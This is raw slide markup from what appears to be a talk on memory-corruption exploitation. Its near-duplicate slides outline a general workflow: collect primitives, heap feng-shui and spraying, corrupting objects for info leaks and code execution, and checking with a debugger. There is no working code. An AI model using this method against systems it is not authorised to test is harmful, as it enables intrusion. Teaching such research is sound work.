            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2279416371"/>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My general approach to Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This saves *A LOT* of time to invent primitives yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3463652654"/>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My general approach to Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11142306" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This saves *A LOT* of time to invent primitives yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>All data is attacker controlled, controlled allocation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dealloction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, heap spray primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3242252"/>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My general approach to Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11142306" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This saves *A LOT* of time to invent primitives yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>All data is attacker controlled, controlled allocation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dealloction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, heap spray primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>One for a relative read to leak object addresses, and one for AAR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3273241948"/>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My general approach to Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11142306" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This saves *A LOT* of time to invent primitives yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
